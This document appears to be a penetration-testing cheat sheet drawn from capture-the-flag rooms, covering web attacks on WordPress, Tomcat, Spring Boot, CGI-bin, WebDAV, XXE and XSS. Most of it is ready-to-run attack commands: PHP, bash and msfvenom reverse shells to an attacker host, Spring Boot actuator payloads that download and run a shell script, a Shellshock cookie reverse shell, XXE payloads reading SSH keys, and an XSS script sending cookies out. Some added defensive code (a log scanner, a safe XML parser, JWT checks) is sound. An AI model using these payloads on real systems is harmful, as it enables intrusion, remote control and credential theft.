WordPress
Reverse Shell #1 - Edit existing Plugin
Examples
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php
Replace the plugin file's contents (here akismet.php) with the reverse shell and save. After this the plugin no longer appears under Installed Plugins.
Request the file with curl to trigger it.
Kali
curl http://$VICTIM/wp-content/plugins/akismet/akismet.php
Reverse Shell #2 - Upload Plugin
Examples
Mr Robot CTF Retro
revshell.php code
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>
Kali
vi revshell.php
zip revshell.zip revshell.php
nc -lvnp 443
Tomcat
Common usernames and passwords
Examples
Thompson
Reverse Shell
Examples
Thompson
Kali
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$KALI LPORT=1337 -f war > rshell.war
nc -lvnp 1337
Spring Boot
Reverse Shell
Examples
Exploit: https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database/
The example below includes an IP-check header (x-9ad42dea0356cb04: 172.16.0.21), which may not be necessary on other targets.
Kali #2
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'ping -c 5 $KALI\');\"}' "https://$VICTIM/actuator/env" -k
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k
reverse.sh
bash -c "bash -i >& /dev/tcp/$KALI/1337 0>&1"
Kali #1
python3 -m http.server 81
Kali #2
Download payload
Kali #3
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'wget http://$KALI:81/reverse.sh -O /tmp/reverse.sh\');\"}' "https://$VICTIM/actuator/env" -k
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k
Run payload
Kali #3
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'bash /tmp/reverse.sh\');\"}' "https://$VICTIM/actuator/env" -k
curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://$VICTIM/actuator/restart" -k
See command output in the page source
Examples
Jack-of-All-Trades
Sometimes the command output is not visible in the rendered page, so check the page source instead.
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=whoami
Kali
Browser
view-source:http://$VICTIM:22/nnxhweOV/index.php?cmd=nc%20-c%20sh%2010.10.154.80%201337
CGI-Bin
Scanning
Examples
0day
See if a cgi-bin folder appears in the initial scans; if it does, start scanning that directory for .cgi files.
Kali
gobuster dir -u http://$VICTIM/cgi-bin/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt,cgi
Shell
Examples
0day
Link: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi
Kali #1
Kali #2
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/$KALI/4242 0>&1' http://$VICTIM/cgi-bin/test.cgi
Change request type
Examples
Mother's Secret
Change the request method to POST and add the other highlighted fields; the status message now changes.
Now change the YAML to the emergency override code mentioned in the room.
Now repeat the same steps for the api/nostromo route and the new file we discovered.
WebDAV Cadaver
If the server is running WebDAV and we have credentials, we can log in and upload files.
Examples
Dav
Kali
cadaver http://$VICTIM:80/webdav
Username: wampp
Password: xampp
dav:/webdav/> put shell.php shell.php
XXE Injection
Exploiting XXE - In-Band
Examples
Exploiting XXE - Out-of-Band
Examples
SSRF + XXE
Examples
XML-RPC
Check if it is enabled
Examples
Retro
wpscan or another scan may have identified that xmlrpc.php exists; if so, check whether it is enabled.
POST /$SITE/xmlrpc.php HTTP/1.1
Host: $VICTIM
Content-Length: 91
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
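Defender-side counterpart to the WordPress plugin request, the xmlrpc.php probe, the Spring Boot actuator POSTs and the cmd= webshell requests shown in the sections above: an added example (not from the page or any of the rooms) that scans constructed access log lines for those request shapes. The log lines, IPs and rule names are all constructed.

```python
import re
from collections import Counter

# Constructed combined-format access log lines (not from any real host); five mirror the
# request shapes in this page's notes, the last two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/2023:10:01:02 +0000] "GET /wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 0 "-" "curl/8.4.0"
10.0.0.5 - - [01/Dec/2023:10:01:09 +0000] "POST /xmlrpc.php HTTP/1.1" 200 417 "-" "curl/8.4.0"
10.0.0.7 - - [01/Dec/2023:10:02:15 +0000] "POST /actuator/env HTTP/1.1" 200 0 "-" "curl/8.4.0"
10.0.0.7 - - [01/Dec/2023:10:02:16 +0000] "POST /actuator/restart HTTP/1.1" 200 0 "-" "curl/8.4.0"
10.0.0.9 - - [01/Dec/2023:10:03:40 +0000] "GET /nnxhweOV/index.php?cmd=whoami HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.3 - - [01/Dec/2023:10:05:00 +0000] "GET /wp-admin/plugins.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.0.0.3 - - [01/Dec/2023:10:05:30 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "request" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')

# Rules are matched against the request line ("METHOD path HTTP/x"). The plugin rule is a
# heuristic: browsers normally reach plugin code via wp-admin or admin-ajax, not by GETting
# the plugin's PHP file directly.
RULES = [
    ("direct request to a plugin PHP file", re.compile(r"^GET /wp-content/plugins/\S+\.php")),
    ("xmlrpc.php POST (method probe)", re.compile(r"^POST /xmlrpc\.php")),
    ("actuator write endpoint", re.compile(r"^POST /actuator/(env|restart)(\s|\?|$)")),
    ("cmd= parameter (webshell)", re.compile(r"[?&]cmd=")),
]


def scan(log_text):
    """Return one (ip, rule_name, request_line) tuple per matching log line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; keep going rather than abort the scan
        for name, pattern in RULES:
            if pattern.search(m["req"]):
                hits.append((m["ip"], name, m["req"]))
    return hits


def hits_per_ip(log_text):
    """Count flagged requests per source IP, for triage ordering."""
    return Counter(ip for ip, _name, _req in scan(log_text))
```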
View Files
Examples
Input
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&xxe;</com>
</comment>
Base64 encode the file
<!DOCTYPE replace [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=acc.php"> ]>
<search>&test;</search>
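The application-side fix for the two payloads above, as an added example (not code from the page or the room): untrusted XML is refused whenever it carries a DTD, because an external entity can only be declared there. The inputs are constructed copies of this section's payloads plus one benign comment.

```python
import xml.etree.ElementTree as ET

# Constructed inputs: the two payload shapes from this section and a benign comment.
XXE_FILE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM 'file:///home/barry/.ssh/id_rsa'>]>
<comment><name>Joe Hamd</name><author>Barry Clad</author><com>&xxe;</com></comment>"""
XXE_FILTER = b"""<!DOCTYPE replace [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=acc.php"> ]>
<search>&test;</search>"""
BENIGN = b"<comment><name>Joe Hamd</name><author>Barry Clad</author><com>thanks</com></comment>"


class UnsafeXML(ValueError):
    pass


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML from an untrusted client, refusing anything that could carry XXE."""
    # A NUL byte means UTF-16/32 text; the byte checks below would not see "<!DOCTYPE"
    # in that encoding, so reject instead of trying to normalise.
    if b"\x00" in data:
        raise UnsafeXML("only UTF-8 XML is accepted")
    # Every XXE payload needs an <!ENTITY ... SYSTEM> declaration, and that can only live
    # inside a DTD, so refusing all DTDs removes the whole class. (In PHP the equivalent
    # is to never pass LIBXML_NOENT / LIBXML_DTDLOAD to simplexml or DOMDocument.)
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        raise UnsafeXML("DTD / entity declaration not allowed")
    return ET.fromstring(data)


def classify(data: bytes):
    """Small wrapper returning ('ok', root_tag) or ('rejected', reason)."""
    try:
        root = parse_untrusted(data)
    except UnsafeXML as err:
        return ("rejected", str(err))
    return ("ok", root.tag)
```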
XSS
Reflected XSS
Examples
Stored XSS
Examples
Dom-Based XSS
Examples
XSS - Steal JWT
Examples
XSS - Steal JWT
https://jwt.io/
I tried updating the token; it didn't work.
Next we're going to try to steal the JWT from another user.
Kali
Browser
<script>document.location='http://$KALI:4444/XSS/grabber.php?c='+document.cookie</script>
This was annoying because it wouldn't work from my posts, so I went to Jake's post and changed the number from 2 to 6 to get to the report page, then just clicked the report button.
We got a token from a user that isn't us.
We can see it is from Michael who is an admin.
Sent it again, but this time just forwarded the request so we could see what that script was doing.
The script was printing the flag
This wasn't working before, but the next time I came back to this box I could just update the cookie from the browser and it worked.
Browser cookie
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY
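Added example (not from the page or the room) that reads the claims out of the cookie above and shows the server-side HS256 check that makes a hand-edited token fail, which is why simply updating the token did not work. DEMO_SECRET is a constructed placeholder, since the room's real signing key is unknown.

```python
import base64
import hashlib
import hmac
import json

# The JWT captured in this section; header and claims are plain base64url JSON,
# so they are readable without the signing key (this is all jwt.io does).
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9."
         "O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY")

DEMO_SECRET = b"constructed-demo-secret"  # placeholder, not the room's key


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_claims(token: str):
    """Return (header, claims) without verifying anything."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(payload_b64))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issue a token the way the server does: HMAC-SHA256 over header.payload."""
    header = _b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes) -> bool:
    """Server-side check: recompute the HMAC and compare in constant time."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(_b64url_encode(expected), sig_b64)


def replace_claims(token: str, claims: dict) -> str:
    """Swap the payload but keep the old signature: what hand-editing a token does."""
    header_b64, _old, sig_b64 = token.split(".")
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header_b64}.{payload}.{sig_b64}"
```

The grabber above only works because the cookie is readable from JavaScript; setting the HttpOnly flag on the session cookie keeps document.cookie from exposing it.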
CSRF
Examples
CSRF